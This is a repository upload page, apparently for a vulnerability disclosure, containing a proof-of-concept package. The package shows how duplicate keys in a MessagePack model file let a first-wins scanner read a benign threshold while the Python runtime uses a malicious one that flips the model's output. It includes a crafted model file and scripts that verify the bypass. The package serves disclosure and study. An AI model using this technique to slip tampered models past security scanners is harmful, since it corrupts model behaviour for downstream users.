Upload 7 files

Browse files

Files changed (7) hide show

msgpack_duplicate_key_mfv_poc_package/NO_CODE_EXECUTION_CLAIM.txt +1 -0
msgpack_duplicate_key_mfv_poc_package/README.md +25 -0
msgpack_duplicate_key_mfv_poc_package/control_model.msgpack +3 -0
msgpack_duplicate_key_mfv_poc_package/duplicate_threshold_model.msgpack +3 -0
msgpack_duplicate_key_mfv_poc_package/expected_output.json +14 -0
msgpack_duplicate_key_mfv_poc_package/inspect_msgpack_duplicate_key.py +31 -0
msgpack_duplicate_key_mfv_poc_package/verify_msgpack_duplicate_key.py +44 -0

msgpack_duplicate_key_mfv_poc_package/NO_CODE_EXECUTION_CLAIM.txt ADDED Viewed

	@@ -0,0 +1 @@


1	+ This PoC does not execute code. It demonstrates MessagePack duplicate-key parser differential and output manipulation.

msgpack_duplicate_key_mfv_poc_package/README.md ADDED Viewed

	@@ -0,0 +1,25 @@

+# MessagePack duplicate-key parser differential PoC
+This repository contains a Model File Vulnerability PoC for the MessagePack (`.msgpack`) model format.
+## Files
+- `duplicate_threshold_model.msgpack` — MessagePack model file with duplicate `threshold` keys.
+- `control_model.msgpack` — normal control model file.
+- `verify_msgpack_duplicate_key.py` — loads the model with msgpack and verifies output manipulation.
+- `inspect_msgpack_duplicate_key.py` — demonstrates first-wins vs last-wins parser differential.
+- `expected_output.json` — expected output.
+## Security claim
+The malicious `.msgpack` model file contains duplicate top-level `threshold` keys. A first-wins scanner sees the benign threshold `0.99`, while Python `msgpack.unpackb()` collapses the map to a dict using the last duplicate value `-0.5`. The runtime threshold flips the model output for the same input.
+This is not code execution. It is a model-file parser differential / scanner-bypass / output-manipulation PoC.
+## Reproduce
+```bash
+pip install msgpack
+python inspect_msgpack_duplicate_key.py
+python verify_msgpack_duplicate_key.py
+```

msgpack_duplicate_key_mfv_poc_package/control_model.msgpack ADDED Viewed

	@@ -0,0 +1,3 @@

+version https://git-lfs.github.com/spec/v1
+oid sha256:b871aa38f9afb56dbc4dffa0aa297289c00d4628cbe25be4b0f324a314544efc
+size 114

msgpack_duplicate_key_mfv_poc_package/duplicate_threshold_model.msgpack ADDED Viewed

	@@ -0,0 +1,3 @@

+version https://git-lfs.github.com/spec/v1
+oid sha256:9293d9360e3563f1b60527240128d41cc3f4f1af692297c9b85cf2ee6f881ad1
+size 133

msgpack_duplicate_key_mfv_poc_package/expected_output.json ADDED Viewed

	@@ -0,0 +1,14 @@

+{
+  "verify_expected": {
+    "malicious_runtime_threshold": -0.5,
+    "control_threshold": 0.99,
+    "malicious_trigger_input_class": 1,
+    "control_trigger_input_class": 0,
+    "result": "duplicate-key MessagePack model accepted; runtime last-wins threshold flips output"
+  },
+  "inspect_expected": {
+    "first_wins_scanner_threshold": 0.99,
+    "last_wins_runtime_threshold": -0.5,
+    "msgpack_unpackb_threshold": -0.5
+  }
+}

msgpack_duplicate_key_mfv_poc_package/inspect_msgpack_duplicate_key.py ADDED Viewed

	@@ -0,0 +1,31 @@

+#!/usr/bin/env python3
+import json
+import msgpack
+from pathlib import Path
+HERE = Path(__file__).resolve().parent
+path = HERE / "duplicate_threshold_model.msgpack"
+raw = path.read_bytes()
+pairs = msgpack.unpackb(raw, raw=False, strict_map_key=False, object_pairs_hook=lambda pairs: pairs)
+first_wins = {}
+last_wins = {}
+for k, v in pairs:
+    if k not in first_wins:
+        first_wins[k] = v
+    last_wins[k] = v
+runtime = msgpack.unpackb(raw, raw=False, strict_map_key=False)
+print("=== raw duplicate key pairs ===")
+for idx, (k, v) in enumerate(pairs):
+    print(f"{idx}: {k!r} -> {v!r}")
+print("\n=== parser differential ===")
+print("first-wins scanner threshold:", first_wins["threshold"])
+print("last-wins/runtime threshold :", last_wins["threshold"])
+print("msgpack.unpackb threshold  :", runtime["threshold"])
+print("\n=== scanner risk ===")
+print("A first-wins scanner sees threshold 0.99 (benign), while the runtime dict uses -0.5 (malicious).")

msgpack_duplicate_key_mfv_poc_package/verify_msgpack_duplicate_key.py ADDED Viewed

	@@ -0,0 +1,44 @@

+#!/usr/bin/env python3
+import os
+import json
+import msgpack
+from pathlib import Path
+HERE = Path(__file__).resolve().parent
+def load_runtime(path):
+    # Typical Python MessagePack runtime behavior: map becomes dict, duplicate keys collapse.
+    # In msgpack-python this keeps the last duplicate key value.
+    return msgpack.unpackb(Path(path).read_bytes(), raw=False, strict_map_key=False)
+def infer(model, x):
+    score = sum(float(w) * float(v) for w, v in zip(model["weights"], x)) + float(model["bias"])
+    return int(score > float(model["threshold"]))
+def main():
+    benign_input = [0.0, 0.0]
+    trigger_input = [0.0, 0.0]
+    malicious = load_runtime(HERE / "duplicate_threshold_model.msgpack")
+    control = load_runtime(HERE / "control_model.msgpack")
+    result = {
+        "malicious_runtime_threshold": malicious["threshold"],
+        "control_threshold": control["threshold"],
+        "malicious_benign_input_class": infer(malicious, benign_input),
+        "control_benign_input_class": infer(control, benign_input),
+        "malicious_trigger_input_class": infer(malicious, trigger_input),
+        "control_trigger_input_class": infer(control, trigger_input),
+        "claim": "duplicate-key MessagePack file is accepted by runtime unpacker; last duplicate threshold controls inference behavior",
+    }
+    print(json.dumps(result, indent=2))
+    assert malicious["threshold"] == -0.5, "runtime should retain last duplicate key"
+    assert control["threshold"] == 0.99
+    assert infer(control, trigger_input) == 0
+    assert infer(malicious, trigger_input) == 1
+    print("RESULT: duplicate-key MessagePack model was accepted; runtime used the last duplicate threshold and flipped output.")
+if __name__ == "__main__":
+    main()